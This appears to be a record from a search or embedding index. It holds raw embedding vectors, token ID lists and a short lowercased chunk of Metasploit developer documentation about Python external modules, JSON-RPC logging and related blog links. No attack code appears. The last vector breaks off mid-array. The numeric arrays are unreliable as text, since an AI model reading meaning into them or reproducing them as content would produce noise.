0.24997860193252563, 0.15355746448040009, 0.228799968957901, -0.24340617656707764, -0.4839388132095337, 0.0037407889030873775, -0.3858675956726074, -0.608177900314331, -0.026996565982699394, 0.3366885781288147, 0.11141160875558853, 0.1589663326740265, 0.8771334886550903, 0.6862932443618774, -0.4247428774833679, 0.20537105202674866, -0.04502198472619057, -0.9021666646003723, 0.5706137418746948, 0.1849929392337799, 0.8016443848609924, 0.07072928547859192, 0.5783802270889282, 0.5332756638526917, 0.0381012037396431, 0.19051849842071533, 0.42365387082099915, 0.11039960384368896, -0.31953755021095276, -0.41645577549934387, -0.15977385640144348, -0.27459487318992615, 0.2865462303161621, -0.22623984515666962, 0.3827299177646637, -0.5226773619651794, -0.2511323392391205, -0.3445764482021332, 0.7818834781646729, 1.1491804122924805, 0.43671876192092896, 0.38255223631858826, 0.032985832542181015, 0.20617680251598358, -0.6151241660118103, 0.13213787972927094, -0.24938058853149414, 0.46337443590164185, -0.557806134223938, 0.4040698707103729, -0.3611387014389038, 0.08286478370428085, -0.40722495317459106, -0.8361437916755676, -0.32542112469673157, -0.08592004328966141, 0.5066965818405151, 0.33229202032089233, -0.3420681953430176, -0.6894294023513794, -0.1220003142952919, 0.1714797168970108, -0.268583744764328, -0.40246501564979553, 0.08716138452291489, 0.6877423524856567, 0.5668404698371887, -0.8043680191040039, 0.3173379600048065, -0.6420913934707642, -0.2794041335582733, 0.1486280858516693, -0.4281723201274872, 0.15050393342971802, -0.523820161819458, -0.507110059261322, -0.7066043019294739, 0.1452455371618271, 0.43430429697036743, 0.02212284691631794, -0.07414022088050842, -1.3589799404144287, -0.17444510757923126, 0.6025469303131104, -0.09813089668750763, -0.7372834086418152, -0.004314003512263298, 0.5967255234718323, 0.17889966070652008, 0.391200989484787, -0.6425474286079407, -0.4642185568809509, -0.03661371022462845, -1.1906843185424805, 0.6805866956710815, -0.6546176671981812, 0.32535427808761597, 0.0978461354970932, -0.2824608385562897, 0.0753040462732315, 0.34338852763175964, -0.9379258751869202, 0.03479872643947601, -0.028355926275253296, 0.1924385130405426, -0.39032381772994995, -0.112698495388031, 0.6040754318237305, 0.04663506895303726, -0.34615540504455566, 0.6738179922103882, 0.17577633261680603, -0.4269450604915619, 0.28457111120224, -0.38040691614151, 0.293316125869751, 0.43994665145874023, -0.9559618234634399, 0.0943731963634491, 0.09146447479724884, -0.11537202447652817, 0.18299660086631775, -0.25596919655799866, 0.40553614497184753, -0.49099618196487427, 0.1619710624217987, -0.9417861700057983, -0.567182183265686, 0.12292733788490295, 0.333268940448761, 0.03184952214360237, 0.041396599262952805, 0.5525742769241333, -0.6420114636421204, 0.07602183520793915, -0.7411788702011108, -0.4143576920032501, -1.067736268043518, 0.21873579919338226, -0.5271064639091492, 0.3786678612232208, -0.1948697865009308, 0.18864573538303375, -0.3738814890384674, -0.6536259651184082, 0.25237104296684265, -0.43212202191352844, -0.2020859718322754, -1.181828498840332, 0.40605583786964417, -0.18157297372817993, 0.13815715909004211, -0.07644660025835037, 0.22544708847999573, -0.07466914504766464, 0.08913355320692062, 0.051978155970573425, -0.10166370868682861, 0.3058161735534668, -0.045786745846271515, -0.13145150244235992, 0.8216652870178223, 0.38473865389823914, -0.733376681804657, -0.058322738856077194, 0.3392980396747589, -0.41112568974494934, -0.16052311658859253, -0.16760148108005524, -0.4831314980983734, -0.6762455105781555, -0.9414970278739929, 0.19214873015880585, -0.31980806589126587, 0.10330904275178909, -0.5632193088531494, -0.4185325503349304, -0.15515752136707306, 0.600429892539978, 0.05552203953266144, -0.8064566254615784, 0.3789690136909485, -0.05726451054215431, 0.41640302538871765, -0.286355584859848, -0.2648322284221649, -0.12136735022068024, 0.04745278134942055, -0.4216797351837158, 0.0839703232049942, 0.0625188797712326, -0.15849368274211884, 0.12405624985694885, -0.028050445020198822, 0.38463902473449707, -0.48448339104652405, -0.6674320101737976, -0.4231356382369995, -0.6699177622795105, -0.0004970861482433975, -0.4551007151603699, 0.9303349256515503, -0.39715903997421265, 0.4104378819465637, -0.022965528070926666, 0.3228521943092346, -0.14221131801605225, -0.2244923859834671, -0.11210305988788605, -0.15604190528392792, 0.6786196231842041, -0.5602091550827026, -0.3119913339614868, 0.14173729717731476, 0.47205060720443726, 0.15560439229011536, 0.2522938847541809, -0.3506951332092285, 0.16288021206855774, -0.6136188507080078, -1.0712132453918457, 0.5420515537261963, -0.20628055930137634, -0.5158739686012268, -0.19300778210163116, -0.5148908495903015, 0.720879316329956, -0.27121907472610474, 0.43619304895401, 0.7816901803016663, -0.00962161086499691, 0.957433819770813, -0.7233288884162903, 0.47529321908950806, 0.37945374846458435, 0.37691426277160645, 0.5237333178520203, 0.09249332547187805, -0.13013170659542084, -0.10404389351606369, -0.31833410263061523, -0.07894760370254517, -0.3215271532535553, -0.2729416489601135, 0.6165996193885803, -0.23860648274421692, 0.7151129841804504, -0.07661104947328568, -1.0869557857513428, -0.31566816568374634, 0.23658141493797302, 0.167390376329422, -0.3293062448501587, 0.6324465870857239, -0.06950245797634125, 0.45157915353775024, -0.5993636250495911, 0.14668689668178558, -0.31387200951576233, 0.13760754466056824, 0.3296104669570923, 0.07569637894630432, -0.8672648072242737, 0.5706327557563782, 0.6936447620391846, -1.369871973991394, -0.603106677532196, -0.6008691191673279, -0.1061096265912056, -0.08152014017105103, -0.7112219333648682, -0.3292815387248993, 0.014433263801038265, -0.18297961354255676, 0.13433919847011566, 0.33447328209877014, 0.05664254352450371, 0.03526873514056206, -0.3343732953071594, -0.3354315757751465, -0.5794381499290466, 0.28173428773880005, 0.6098961234092712, -1.1101278066635132, -0.4796984791755676, -0.7255457043647766, -0.3329690992832184, 0.22634364664554596, -0.3407701253890991, 1.1349647045135498, -0.23881776630878448, 0.5103603601455688, 0.3248833417892456, 0.0009040324366651475, 0.8094305396080017, 0.026707058772444725, 0.228612020611763, 0.9584488272666931, 0.37436193227767944, -0.35639891028404236, -0.30332615971565247, 0.28272923827171326, 0.06638886034488678, 0.3089056611061096, -0.0031321519054472446, -0.2952378988265991, -0.2311454713344574, 0.429960697889328, -0.24012026190757751, -0.5456269383430481, -0.24047276377677917, -0.709284245967865, -0.007980055175721645, 0.30852118134498596, 0.016043690964579582, -0.28548479080200195, -0.10871773213148117, -0.27564334869384766, -0.5574895143508911, -0.4297679364681244, -0.08879198133945465, -0.09796125441789627, 0.41160672903060913, -0.7478712797164917, 0.07162471115589142, -0.4858495593070984, -0.0432947501540184, -0.956278920173645, -0.20111343264579773, -0.1302613914012909, -0.49042296409606934, -0.5130308270454407, -0.4560578763484955, -0.7057385444641113, 0.5446516275405884, -0.5157294869422913, 0.33450332283973694, 0.025558093562722206, -0.264945387840271, 0.4665738046169281, 0.29287272691726685, -0.7265745401382446, 0.024598414078354836, 0.45117875933647156, 0.3853283226490021, 0.2816634774208069, -0.6254515647888184, -0.340974360704422, 0.24181148409843445, 0.1386842578649521, 0.5939565300941467, -0.08555769175291061, -0.4792104959487915, 0.12449552863836288, 0.1868506669998169, -0.7634369134902954, 0.04339181259274483, -0.5321913957595825, -0.0348188541829586, 0.2601794898509979, -0.39142554998397827, 0.3852318525314331, 0.6938021183013916, 0.3802594244480133, 0.2319565713405609, -0.2594687044620514, 0.22389598190784454, 0.4598419964313507, 0.23215293884277344, -0.15746022760868073, -0.061823196709156036, 0.3119429051876068, -0.4728793799877167, 0.22385695576667786, 0.34674617648124695, -0.6807914972305298, 0.581720232963562, -0.24653850495815277, -0.2461337447166443, -0.11441552639007568, -0.5060597658157349, -0.30789169669151306, 0.22388939559459686, 0.5719656348228455, -0.5132843255996704, 0.3738148808479309, 0.09409638494253159, -0.6320816278457642, 0.4042094349861145, -0.4230254888534546, -0.664384663105011, 0.30826663970947266, -0.261430561542511, 0.17107564210891724, -0.34332507848739624, 0.08943083137273788, -0.026484403759241104, -0.4029843807220459, 0.029837772250175476, 0.1606922149658203, -0.22079555690288544, -0.188604936003685, 0.7576707601547241, -0.6433237195014954, -0.08126745373010635, -0.15504629909992218, 0.5425823330879211, -0.5335467457771301, -0.5615859627723694, 0.2781737148761749, 0.8581348061561584, 0.23100519180297852, 0.23110581934452057, -0.42794016003608704, -0.47907689213752747, -0.43623703718185425, -0.005204693879932165, 0.06965790688991547, 0.07849176973104477, -0.3953776955604553, 0.01746249385178089, -0.9532930850982666, 0.1810789257287979, 0.07717540115118027, -0.034183915704488754, -0.0011633532121777534, -0.23164111375808716, -0.4450094699859619, 0.1699565052986145, 0.01605692133307457, 0.21611683070659637, 0.3912034332752228, 0.739999532699585, 0.193040132522583, -0.5340250134468079, -0.655194103717804, -0.15718761086463928, -0.020757121965289116, -0.05079010874032974, 0.2172357439994812, -0.14127622544765472, 0.18546971678733826, 0.47995150089263916, -0.9867191910743713, -0.49833616614341736, 0.740119218826294, 0.15853048861026764, -0.020042456686496735, 0.20868805050849915, -0.5300467610359192, 0.04774143546819687, 0.08401855826377869, -0.5891628861427307, 0.41892009973526, 0.4821779429912567, 0.28379637002944946, -0.04935421794652939, -0.5752415060997009, 0.502707839012146, 0.13591137528419495, 0.07349928468465805, -0.4249383509159088, -0.3981735110282898, 0.6270632743835449, 0.33016470074653625, -0.05040300637483597, 0.5972860455513, 0.5903548002243042, 0.2461758255958557, 0.178755983710289, 0.5924848914146423, 0.05887413024902344, 0.3154413104057312, 0.3032439649105072, -0.22194504737854004, -0.4642139673233032, 0.3464325964450836, 0.21148574352264404, -0.3504624664783478, -0.5537516474723816, 0.257658988237381, 0.32992053031921387, 0.3582923412322998, 0.08370203524827957, -0.35621878504753113, -0.062111519277095795, -0.5540210008621216, 0.877045214176178, -0.42111775279045105, 0.3157590925693512, -0.1722341775894165, -0.32676413655281067, -0.26321545243263245, 1.0042353868484497, -0.18676312267780304, 0.7237510085105896, 0.10115011036396027, 0.814570426940918, 0.0869787186384201, 0.16064545512199402, -0.2390211671590805, -0.33339056372642517, -0.03769153729081154, -0.013257654383778572, -0.5132625102996826, -0.4892936944961548, -0.12127767503261566, 0.03539186343550682, 0.5676777362823486, -0.3832523226737976, -0.7989560961723328, -0.35255154967308044, 0.1241687759757042, -0.24706996977329254, -0.831844687461853, 0.13852086663246155, 0.07018839567899704, -0.5925508737564087, 0.150967538356781, -0.026949075981974602, -0.19592301547527313, 0.6818442940711975, -0.07897179573774338, -0.44020262360572815, -0.05773412063717842, -0.1365470290184021, 0.08342145383358002, 0.9622163772583008, -0.3656267523765564, -0.24630428850650787, 0.1226801946759224, -0.4358295202255249, -0.6921917200088501, -0.43151625990867615, -0.2639941871166229, -0.35371342301368713, -0.055777657777071, 0.15457673370838165, 0.524591863155365, 0.34063777327537537, -0.4131764769554138, 0.10960239917039871, 0.2533838450908661, 0.8489668369293213, 0.1255297213792801, 0.9600040912628174, 0.2826142907142639, -0.20327389240264893, 0.41875359416007996, -0.5660396218299866, 1.2157280445098877, 0.20145641267299652, -0.24169009923934937, 0.23462431132793427, -0.12229461967945099, -0.6364198923110962, -0.6672673225402832, -0.03962695598602295, -0.1428523063659668, -0.06043435260653496, -0.06897781789302826, -0.6703982949256897, -0.25498783588409424, -0.5464178919792175, -0.18079112470149994, 0.02470063604414463, 0.724682629108429, 0.4471316337585449, -0.3387826979160309, 0.7673758268356323, -1.0491247177124023, 4.59524393081665, 0.32105109095573425, 0.10407856851816177, 0.6611770987510681, 0.1575818508863449, 1.1805469989776611, 0.9756672978401184, 0.14365741610527039, 0.15774698555469513, -0.5309473276138306, 0.13435645401477814, 0.08968506753444672, 0.3726160526275635, 0.4774361848831177, 0.4858798086643219, 0.3427136540412903, -0.792498767375946, -0.46035075187683105, 0.46016520261764526, -0.7535765767097473, -0.7989141941070557, 0.17512960731983185, -0.225735604763031, 1.0045781135559082, 0.4052639603614807, 0.1440649926662445, 0.33882614970207214, -0.4898594915866852, 0.18744678795337677, -0.25323182344436646, -0.48086270689964294, -0.40102240443229675, 0.27269765734672546, -0.13600344955921173, -0.30930569767951965, 0.08467646688222885, 0.2950674593448639, -0.6267068386077881, -0.8905603885650635, -0.16638515889644623, 0.5077074766159058, -0.35811376571655273, 0.07484085857868195, -0.25612780451774597, 0.033977750688791275, 0.6766921281814575, -0.26008933782577515, 0.15611325204372406, 1.0258084535598755, -0.8399304747581482, 0.2962700426578522, -0.2811213433742523, 0.9031251668930054, 0.00469514774158597, -0.5471621751785278, 0.024694016203284264, 0.06444885581731796, -0.3521105647087097, -0.12346966564655304, -0.12232077866792679, 0.8575233817100525, -0.5583536624908447, 0.03323408588767052, -0.03791310265660286, -1.0633389949798584, 0.7232522964477539, -0.2128826379776001, 0.7936066389083862, -0.3797943890094757, 0.35085904598236084, -0.4941175580024719, 0.13022415339946747, -0.5436784029006958, -0.6507805585861206, 0.6708253622055054, -0.15681858360767365, -0.014870980754494667, 0.2694087326526642, 0.6542611718177795, -0.7854229807853699, 0.001942335395142436, -0.06892397254705429, -1.2458173036575317, 0.06126457452774048, 0.6444471478462219, 0.6599342226982117, 0.4185781180858612, -0.5882380604743958, 0.2236880213022232, 0.1608579158782959, 0.502548336982727, 0.6857771873474121, 0.013405813835561275, 0.39110469818115234, 0.40205684304237366 ]
[ 4471, 1000, 1010, 1000, 11498, 5244, 1000, 1024, 1063, 1000, 2504, 1000, 1024, 1000, 18558, 1000, 1010, 1000, 4471, 1000, 1024, 1000, 15488, 2497, 2487, 5219, 16437, 2035, 24755, 2618, 2512, 13704, 2094, 4770, 3112, 1000, 1065, 1065, 1063, 1000, 1046, 3385, 14536, 2278, 1000, 1024, 1000, 1016, 1012, 1014, 1000, 1010, 1000, 4118, 1000, 1024, 1000, 4471, 1000, 1010, 1000, 11498, 5244, 1000, 1024, 1063, 1000, 2504, 1000, 1024, 1000, 18558, 1000, 1010, 1000, 4471, 1000, 1024, 1000, 15488, 2497, 2487, 5219, 16437, 2035, 24755, 2618, 2512, 13704, 2094, 4770, 3112, 1000, 1065, 1065, 2000, 5587, 3338, 26521, 2000, 2115, 18750, 3642, 1010, 5587, 1996, 2917, 3642, 1055, 3490, 29519, 1012, 3602, 2008, 1996, 9123, 3338, 26521, 2097, 2069, 2147, 2043, 2770, 1996, 6327, 14184, 2004, 26609, 18750, 14546, 1010, 1998, 2180, 1521, 1056, 2147, 2043, 2770, 2013, 5796, 11329, 5644, 9890, 1024, 12324, 22851, 2497, 1025, 22851, 2497, 1012, 29198, 16861, 2007, 2806, 8095, 1996, 18750, 3642, 1999, 18804, 13102, 4135, 4183, 8704, 2000, 2022, 27233, 1022, 24577, 1012, 1996, 5221, 5966, 2746, 2013, 18804, 13102, 4135, 4183, 1521, 1055, 10090, 2806, 1024, 2048, 3210, 2090, 4972, 1006, 2021, 2025, 2465, 4725, 1007, 2048, 3210, 2090, 2367, 4127, 1997, 3642, 1006, 2066, 17589, 1998, 1996, 27425, 1010, 2156, 2682, 1007, 2176, 7258, 2005, 27427, 26951, 14045, 16861, 9804, 2000, 2228, 2055, 2043, 3015, 2115, 11336, 1024, 9544, 1000, 29379, 1063, 1065, 1000, 1012, 4289, 1006, 1005, 3347, 1005, 1007, 2058, 6970, 18155, 3370, 2007, 1003, 2562, 2115, 2655, 5963, 4725, 2460, 1998, 3191, 3085, 1012, 2065, 2009, 4152, 18856, 23128, 1010, 3338, 2041, 4942, 1011, 8518, 2046, 2092, 1011, 2315, 4972, 10755, 19210, 3415, 2323, 2022, 22726, 1010, 3191, 3085, 1010, 1998, 2460, 1006, 1037, 5009, 1007, 2065, 2017, 2428, 2342, 18750, 2509, 2838, 1999, 2115, 11336, 1010, 2224, 1001, 999, 1013, 2149, 2099, 1013, 8026, 1013, 4372, 2615, 18750, 2509, 2005, 1996, 2016, 25153, 10128, 2017, 2031, 1037, 2843, 1997, 8027, 3642, 1999, 1016, 1012, 1021, 2030, 2342, 1037, 1016, 1012, 1021, 3075, 1010, 2224, 1001, 999, 1013, 2149, 2099, 1013, 8026, 1013, 4372, 2615, 18750, 2475, 1012, 1021, 1006, 6097, 2891, 1999, 3327, 2515, 2025, 2911, 2007, 1037, 18750, 2475, 4654, 8586, 23056, 2011, 12398, 1007, 2065, 2825, 1010, 2031, 2115, 11336, 11892, 2007, 2119, 1998, 2224, 1001, 999, 1013, 2149, 2099, 1013, 8026, 1013, 4372, 2615, 18750, 1006, 9280, 1007, 2691, 3980, 2339, 2987, 1521, 1056, 1996, 11336, 3711, 2043, 1045, 3945, 2005, 2009, 1999, 5796, 11329, 5644, 9890, 1029, 1996, 11336, 2089, 2031, 10697, 1998, 8246, 2000, 7170, 2503, 1997, 5796, 11329, 5644, 9890, 1012, 4638, 1996, 7705, 8833, 5371, 1010, 1066, 1013, 1012, 5796, 2546, 2549, 1013, 15664, 1013, 7705, 1012, 8833, 1010, 2005, 7561, 7696, 1012, 2036, 1010, 2065, 1996, 11336, 2003, 2025, 4417, 2004, 4654, 8586, 23056, 1010, 2059, 2009, 2097, 2025, 2265, 2039, 2043, 2017, 3945, 2005, 2009, 1999, 5796, 11329, 5644, 9890, 1012, 2339, 2003, 1996, 6434, 2013, 1996, 18750, 11336, 2025, 4760, 2039, 1999, 5796, 11329, 5644, 9890, 1029, 1996, 6327, 14184, 10639, 2007, 7705, 3081, 1046, 3385, 1011, 1054 ]
metasploit
121.txt
6
##pc. if your python module contains print statements, framework may not recognize those as json - rpc requests. use the loghandler or module. log ( ) to send status information, which will be displayed in msfconsole. additional resourcesrapid7 blog : regifting python in metasploitrapid7 blog : external metasploit modules : the gift that keeps on slitheringmetasploit python libraryerb templates [SEP]
[ 0.49516963958740234, -0.8613100647926331, -0.5244008302688599, 0.6324074268341064, -0.1601686030626297, -0.1530466377735138, 0.26982933282852173, 0.4307071268558502, 0.11217521876096725, 1.2307143211364746, 0.29297637939453125, -0.19554750621318817, 0.35619881749153137, 0.18185506761074066, -0.9191635251045227, 0.10391045361757278, 0.5440071821212769, -0.6510186195373535, -0.39574822783470154, 0.052554596215486526, -0.5217881798744202, 0.02642017789185047, -0.6508303880691528, -0.22014395892620087, -1.6157740354537964, 0.05350848659873009, -0.6220486760139465, -0.23145951330661774, 0.9394584894180298, 0.7350567579269409, -0.1764066368341446, -0.15328258275985718, 0.28356030583381653, -0.7024792432785034, 0.00008699783211341128, -0.3635307550430298, 0.2864171266555786, -0.45473575592041016, -0.4436379671096802, -0.8923883438110352, 0.12099182605743408, -0.2530348002910614, 0.10348300635814667, -0.8287944793701172, -0.5290358662605286, -0.06484843045473099, 0.2985996901988983, 0.0885835736989975, 0.2466660588979721, 0.02524429000914097, 0.1245097890496254, 0.9795436263084412, 0.17558921873569489, 0.043504662811756134, -0.8913511037826538, -0.09428612887859344, -0.23830129206180573, -0.24885675311088562, -0.2410033792257309, -0.23962505161762238, 0.05786328762769699, 0.3074273467063904, 0.10090504586696625, -0.9521834850311279, 0.1285535991191864, 0.23865431547164917, -0.5643265843391418, 0.1533280909061432, 0.3109293580055237, -0.21259978413581848, 0.6509745121002197, 0.9814565777778625, -0.4051598310470581, -0.7517930269241333, -0.5328293442726135, 0.7044124007225037, -0.08549729734659195, 0.08667176216840744, 0.16658900678157806, 1.2399492263793945, 0.30757513642311096, 1.100640058517456, 0.17373128235340118, -0.4832007884979248, -0.38658347725868225, -0.6754570603370667, -0.35295334458351135, -0.700894832611084, -0.3604547083377838, -0.08412421494722366, 0.1237480565905571, 0.513778567314148, -0.004757862538099289, -0.2765211760997772, -0.10683140158653259, 0.5080168843269348, 0.08840226382017136, 0.2845871150493622, -0.5673084259033203, 0.31247377395629883, 0.6145094037055969, 0.7012415528297424, -0.2828991711139679, 0.012172691524028778, 0.07114185392856598, 0.4519902169704437, 0.919692873954773, -0.2705707252025604, -0.9451567530632019, -0.18190769851207733, -0.5637982487678528, -0.02762502431869507, -0.157776340842247, -0.4370926320552826, 0.031132493168115616, 0.7035858631134033, 0.5373787879943848, -0.3837183117866516, -0.30615460872650146, -0.4217587113380432, 0.31304994225502014, -0.5004329085350037, -0.09849086403846741, -0.46950700879096985, -0.04154376685619354, 0.13043411076068878, 0.2313193529844284, 0.7680240869522095, 0.03131614625453949, -0.3896936774253845, -0.1065468043088913, -0.2611505389213562, 0.19403210282325745, 0.3582977056503296, -0.09993989765644073, 0.14301879703998566, 0.009568830952048302, 0.2637863755226135, 0.9149507284164429, -0.03661350533366203, 0.27765700221061707, -0.48994210362434387, 0.36964306235313416, 1.165330171585083, -0.14848195016384125, -0.4718894958496094, 0.002165101934224367, 0.24056489765644073, -1.0774657726287842, -0.3498726487159729, -0.49187421798706055, -0.1334620714187622, 0.06214134022593498, -0.05274977162480354, -0.007095171604305506, 0.12602007389068604, -0.26353007555007935, 0.3101593852043152, 0.4535943269729614, 0.24341270327568054, -0.24394795298576355, 0.2458258718252182, -0.9313355684280396, 0.45596787333488464, 0.15569321811199188, 0.6592971682548523, -0.581725537776947, -1.0290250778198242, -0.10193359106779099, -0.22462783753871918, 0.579852283000946, -0.17121024429798126, -0.43822404742240906, 0.1973050832748413, 1.1634458303451538, 0.04316560924053192, -0.05020761489868164, 0.022048935294151306, 0.21636947989463806, 0.7199732065200806, 0.34616443514823914, 0.9084427356719971, 0.4295731782913208, 0.38533857464790344, 1.0068199634552002, 0.18064410984516144, 0.8535265326499939, 0.12998279929161072, -0.007593817543238401, 0.10417012125253677, 0.509033739566803, 0.4575023055076599, -0.5000601410865784, 0.6070724129676819, -0.4685233533382416, 0.16364218294620514, -0.8151373267173767, 0.8040434122085571, 0.2391400933265686, -0.40009140968322754, -1.1378694772720337, 0.8096997737884521, -0.5712000131607056, 0.17472709715366364, -0.18333347141742706, -0.3210947513580322, 0.5555512309074402, 0.7855857610702515, -0.05527046322822571, 0.3274124562740326, 0.38906654715538025, -0.4224588871002197, -0.8764598369598389, -0.24474935233592987, -0.05199013277888298, -0.5484561324119568, -0.6689757108688354, 0.7209827303886414, -0.16267025470733643, -0.0023788772523403168, 0.500133752822876, 0.7557068467140198, 0.22719839215278625, -0.1287251114845276, -1.1889561414718628, -0.4978538155555725, 0.15650604665279388, 0.3687970042228699, -0.179748073220253, 0.47343701124191284, 0.36507365107536316, 0.367214560508728, 0.015487125143408775, 1.1808418035507202, 0.6111090779304504, -0.17427340149879456, 0.9699432253837585, 0.6259914040565491, -0.13259375095367432, 0.14405985176563263, -0.18319043517112732, 0.5452467799186707, -0.08520480245351791, 0.360975444316864, 0.2220126986503601, 0.09101689606904984, -0.5853610634803772, -0.2249528169631958, -0.6070902943611145, 0.5079108476638794, -0.7112106084823608, 1.013380527496338, 0.28865450620651245, -0.3223722577095032, -0.6068509221076965, -0.44720664620399475, 0.00333554414100945, 0.7689353227615356, -0.9841089844703674, 0.48306792974472046, 0.7895787954330444, -0.14500683546066284, -0.6174601912498474, -0.40443041920661926, 0.10786758363246918, 0.35749325156211853, 0.3138236105442047, 0.08522975444793701, -0.41290482878685, -0.5809853672981262, -0.399835467338562, -0.08213787525892258, -0.83810955286026, -0.1990925818681717, -0.9105714559555054, -0.011799382977187634, 0.618675947189331, -0.49231794476509094, 0.13820797204971313, 0.11920904368162155, 0.09326444566249847, 0.16090236604213715, 0.3533262610435486, 0.7889724373817444, 0.38261380791664124, -0.6424348950386047, -0.4970894157886505, 0.04780138283967972, -0.6732374429702759, 0.46523675322532654, -1.1056170463562012, -0.03263381868600845, -0.13011795282363892, -0.511256754398346, 0.5919875502586365, -0.8233864903450012, 0.1427001953125, -0.3744801878929138, -0.15663546323776245, 0.4671543836593628, -0.8423396348953247, 0.24746210873126984, 0.4735378921031952, -0.0638582855463028, -0.7872008681297302, 0.22297757863998413, -0.08419041335582733, -0.2611646056175232, 0.4435977041721344, 0.6402226090431213, -0.12082202732563019, 1.3686875104904175, -0.3338739275932312, -0.6275689601898193, -0.5342960357666016, 0.5352945327758789, 0.4219057559967041, -0.08550707995891571, 0.5368111729621887, -0.4061776101589203, -0.07176930457353592, -0.05388779193162918, 0.06471970677375793, 0.06755698472261429, -0.23552455008029938, 0.5448437333106995, -0.11072217673063278, -0.47360464930534363, 0.5752289891242981, -0.8615850210189819, 0.28339120745658875, 0.4751541018486023, -0.49769213795661926, 0.07724354416131973, 0.18478535115718842, 0.6520968675613403, -0.8811950087547302, -0.35834696888923645, -0.5237300992012024, 0.5188459753990173, -0.1239270344376564, -0.2871858775615692, 0.17599153518676758, 0.04130275547504425, -0.5008678436279297, -0.09349462389945984, 0.565409779548645, -0.5899659395217896, -0.14469441771507263, -0.14994999766349792, 0.025037679821252823, 0.05015993118286133, 0.16393442451953888, 0.7343336343765259, 0.045261964201927185, 1.6383233070373535, -0.3246655762195587, 0.13277475535869598, -0.1336710900068283, 0.7639555335044861, 0.42494088411331177, 0.7370278835296631, -0.45479458570480347, 0.3658077120780945, -0.8731412887573242, -0.706459641456604, 0.017680952325463295, 1.1532275676727295, 0.7535057067871094, -0.05649445578455925, 0.8862068057060242, -0.8576382398605347, -0.20971012115478516, 0.34656426310539246, 0.009172573685646057, 0.09004157781600952, 0.26327335834503174, 0.42496052384376526, 1.235484004020691, -0.7285636067390442, -0.09085902571678162, -0.06200496479868889, -0.23857539892196655, -0.023224126547574997, -0.3256676197052002, 0.06528644263744354, -0.8832901120185852, -0.16355498135089874, -0.680850625038147, -0.4454907476902008, 0.36326664686203003, 0.2577640116214752, 0.2816609740257263, -0.3805760145187378, -1.138790488243103, 0.03035901114344597, 0.15669851005077362, 0.8834537267684937, 0.6499810218811035, 0.47099387645721436, 0.4660864770412445, -0.30680781602859497, -0.14873166382312775, 0.6611901521682739, -0.3146359920501709, -0.06562858819961548, -0.20190295577049255, 0.45900294184684753, -0.20604190230369568, 0.21771925687789917, -0.580951988697052, -0.13981613516807556, -0.2919793426990509, 0.17158766090869904, -0.9846140146255493, -0.15986742079257965, -0.4852025508880615, 0.9884043335914612, 0.5242621302604675, -0.4823911786079407, -0.3735243082046509, -0.5253630876541138, -0.05519458279013634, 0.4121493399143219, 1.2322076559066772, -0.5692684054374695, 0.0241917185485363, 0.4068278968334198, -0.24357399344444275, 0.6354359984397888, -0.3271110951900482, -0.9241278767585754, -0.6561325788497925, -0.42216581106185913, -1.2372632026672363, 0.793512225151062, 1.1053816080093384, -0.6803399324417114, 0.19500356912612915, -0.5766029953956604, 0.10491994768381119, -0.2879812717437744, -0.41848137974739075, -0.5641940236091614, -0.1048005148768425, -0.026704849675297737, 0.4012547731399536, 0.2009267956018448, -0.594460666179657, -0.06082875281572342, 0.7265649437904358, -0.7694153189659119, 0.323288232088089, -0.8733269572257996, 0.46854791045188904, 0.13970524072647095, -0.38306355476379395, -0.23615683615207672, 0.2197338193655014, -0.33082258701324463, -0.37340715527534485, -0.0723496749997139, 0.27362820506095886, -0.8076561093330383, -0.7829048037528992, 0.403470516204834, 0.5410210490226746, -0.08604055643081665, 0.3499985635280609, 0.09748411923646927, -0.8808438181877136, 0.16108810901641846, 0.3225431442260742, -0.217091366648674, -0.1276898980140686, -0.48699402809143066, 0.11710917949676514, -0.4124947488307953, 0.00918382778763771, 0.7595233917236328, -1.0623242855072021, 1.4976078271865845, 0.5776851773262024, -0.11058074235916138, 0.04063273221254349, -0.8424553275108337, 0.14432290196418762, 0.2915920615196228, 0.05830313265323639, 0.862718403339386, -0.7478407621383667, -0.4959960877895355, -0.10999075323343277, -0.34940120577812195, 0.08517534285783768, -0.2116602510213852, 0.61185222864151, -0.23278416693210602, 0.5200939178466797, 0.1459583342075348, 0.2505398392677307, -0.20378398895263672, -0.898804783821106, 1.0059478282928467, -0.7079471349716187, -0.29112938046455383, -0.1879560649394989, 0.0896572396159172, -0.20175816118717194, -0.17542362213134766, -0.5908386707305908, -0.10675046592950821, -0.2713630795478821, -0.16267958283424377, 0.29266276955604553, 0.2348836213350296, 0.8843457102775574, -0.2446431815624237, 0.09454495459794998, 0.3768337070941925, -0.007927992381155491, -1.10299813747406, 0.0359363779425621, 0.612122654914856, -0.4408148229122162, 0.6691826581954956, 0.40727174282073975, -0.7085667848587036, -0.5190334320068359, -0.10428012162446976, 0.43691498041152954, -0.35582852363586426, -0.3625446856021881, -0.09475047141313553, -0.6231243014335632, -1.0354735851287842, 0.08232104033231735, 0.9464913606643677, -0.8548721671104431, -0.10836716741323471, -0.2542739510536194, 0.7599651217460632, -0.7023730874061584, -0.254101037979126, 0.15258605778217316, -0.5883196592330933, -0.8676387071609497, 0.7140557765960693, -0.1590932458639145, -0.12845537066459656, -0.6444476842880249, 0.018830470740795135, -0.3123711049556732, 0.8915559649467468, -0.31074923276901245, -0.5483517646789551, 0.47959479689598083, 0.27657264471054077, -0.45957958698272705, 0.49685293436050415, 0.0929008349776268, 0.20188665390014648, -0.24259738624095917, 1.0266797542572021, -0.6819848418235779, 0.18293513357639313, 0.043055810034275055, 0.2440202534198761, 1.1660926342010498, -0.19496287405490875, 0.15001891553401947, -0.4074292778968811, 0.8064030408859253, -0.3161633312702179, -0.39219021797180176, -0.4142560362815857, 0.18132084608078003, -0.8522641658782959, -0.25794726610183716, 0.3095039427280426, -0.4317445456981659, -0.1454392671585083, 0.568926215171814, -0.17723539471626282, 0.8691139221191406, -0.5631557106971741, 0.6125429272651672, 0.5486215353012085, -0.21781957149505615, -0.28797003626823425, -0.4491511583328247, 0.3710712492465973, 0.9570598006248474, -0.516808032989502, 0.4809686839580536, 0.4530717730522156, 0.33580830693244934, -0.33388614654541016, -0.03433559834957123, -0.4767306447029114, -0.5017305016517639, -0.2999490797519684, 0.7926695942878723, -0.20219887793064117, 0.7059764862060547, 0.46752941608428955, -0.9178420305252075, -0.6275134682655334, 0.6070051789283752, 0.06495034694671631, 0.6534117460250854, 0.444191038608551, -0.014803733676671982, 0.2198927402496338, -0.23566953837871552, 0.1652752012014389, -0.14817456901073456, -0.15996338427066803, 1.2533231973648071, -0.23835118114948273, -0.3570699393749237, 0.30015796422958374, 